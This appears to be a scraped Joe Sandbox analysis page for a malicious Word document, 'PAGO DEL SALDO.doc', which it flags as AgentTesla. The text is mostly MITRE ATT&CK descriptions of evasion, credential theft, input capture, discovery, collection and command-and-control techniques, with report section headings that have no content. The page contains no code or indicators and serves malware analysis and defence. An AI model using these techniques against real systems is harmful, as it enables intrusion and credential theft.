Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PAGO DEL SALDO.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre